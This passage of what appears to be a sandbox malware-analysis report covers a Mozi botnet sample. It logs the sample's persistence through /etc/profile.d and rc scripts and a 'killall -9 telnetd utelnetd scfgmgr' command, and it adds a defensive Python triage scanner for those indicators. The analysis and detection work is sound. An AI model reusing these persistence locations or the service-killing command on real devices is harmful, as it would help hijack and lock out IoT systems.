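        "mozi_like": bool(opened) and len(dropped & LOCKOUT_PORTS) >= 3,
    }


if __name__ == "__main__":
    for key, value in classify(parse_rules(LOG)).items():
        print(f"{key:16} {value}")
```

Because every rule is inserted with -I, each new rule lands at the top of its chain, so the order in the log is the reverse of the order the kernel evaluates them; a port that receives both an ACCEPT and a DROP must be judged by whichever was inserted last.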
Sample reads /proc/mounts (often used for finding a writable filesystem)
Source: /tmp/Mozi.m (PID: 4580) | File: /proc/4580/mounts
Sample tries to persist itself using /etc/profile
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/profile.d/cedilla-portuguese.sh
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/profile.d/apps-bin-path.sh
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/profile.d/Z97-byobu.sh
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/profile.d/bash_completion.sh
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/profile.d/vte-2.91.sh
Sample tries to persist itself using System V runlevels
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/rcS.d/S95baby.sh
Source: /tmp/Mozi.m (PID: 4580) | File: /etc/rc.local
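For triage of a device or an extracted firmware root filesystem suspected of the same infection, the script below (added here as an example, not part of the report or of the sample) checks the autostart locations listed above for references to the dropped copy at /usr/networks and for the S95baby.sh start script. Both indicators are taken from this run; other builds may use different names, so INDICATORS is a starting point rather than a complete list (assumption). build_fixture() writes a constructed mini root filesystem, with file contents invented for the dry run, so the scan can be exercised offline.

```python
"""Scan a root filesystem for the persistence this run left behind.

Added example for this report, not part of Joe Sandbox or of the sample.
Point scan_root() at "/" on a live box or at an unpacked firmware rootfs.
"""
import os
import tempfile

# Autostart locations the sandbox saw the sample touch, plus the usual
# SysV siblings (assumption: layout varies between vendor firmwares).
AUTOSTART = ("etc/rc.local", "etc/rcS.d", "etc/rc.d", "etc/init.d",
             "etc/profile.d", "etc/profile")
# Taken from this run: the dropped binary path and the start-script name.
INDICATORS = ("/usr/networks", "S95baby.sh")


def scan_root(root):
    """Return (relative path, finding) pairs; findings are 'name:<indicator>'
    for a matching file name and 'ref:<indicator>' for a matching content."""
    findings = []
    for rel in AUTOSTART:
        path = os.path.join(root, rel)
        if os.path.isdir(path):
            entries = [os.path.join(path, n) for n in sorted(os.listdir(path))]
        elif os.path.isfile(path):
            entries = [path]
        else:
            continue
        for entry in entries:
            relname = os.path.relpath(entry, root)
            base = os.path.basename(entry)
            if base in INDICATORS:
                findings.append((relname, "name:" + base))
            try:
                with open(entry, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue  # unreadable or a directory entry; nothing to grep
            for ind in INDICATORS:
                if ind.encode() in data:
                    findings.append((relname, "ref:" + ind))
    return findings


def build_fixture():
    """Constructed mini rootfs mirroring the paths from this run. The file
    contents are invented for the dry run, not copied from the sample."""
    root = tempfile.mkdtemp(prefix="mozi-triage-")
    os.makedirs(os.path.join(root, "etc/rcS.d"))
    os.makedirs(os.path.join(root, "etc/profile.d"))
    with open(os.path.join(root, "etc/rc.local"), "w") as fh:
        fh.write("#!/bin/sh\n/usr/networks &\nexit 0\n")
    with open(os.path.join(root, "etc/rcS.d/S95baby.sh"), "w") as fh:
        fh.write("#!/bin/sh\n/usr/networks\n")
    with open(os.path.join(root, "etc/profile.d/bash_completion.sh"), "w") as fh:
        fh.write("# benign file left untouched\n")
    return root


if __name__ == "__main__":
    for relname, finding in scan_root(build_fixture()):
        print(f"{relname:32} {finding}")
```

On a real device also compare the file's mtime with the rest of /etc: the profile.d entries above were opened by the sample, and a recent modification time on any of them is worth a diff against the vendor image even when no indicator string matches.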
Terminates several processes with shell command 'killall'
Source: /bin/sh (PID: 4584) | Killall command executed: killall -9 telnetd utelnetd scfgmgr
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/230/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/231/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/232/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/233/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/234/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3512/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/359/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/1452/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3632/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3518/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/10/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/1339/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/11/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/12/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/13/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/14/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/15/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/16/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/17/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/18/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/19/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/483/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3527/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3527/cmdline
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/1/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/2/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3525/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/1346/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3524/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3524/cmdline
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/4/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/3523/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/5/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/7/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/8/stat
Source: /usr/bin/killall (PID: 4584) | File opened: /proc/9/stat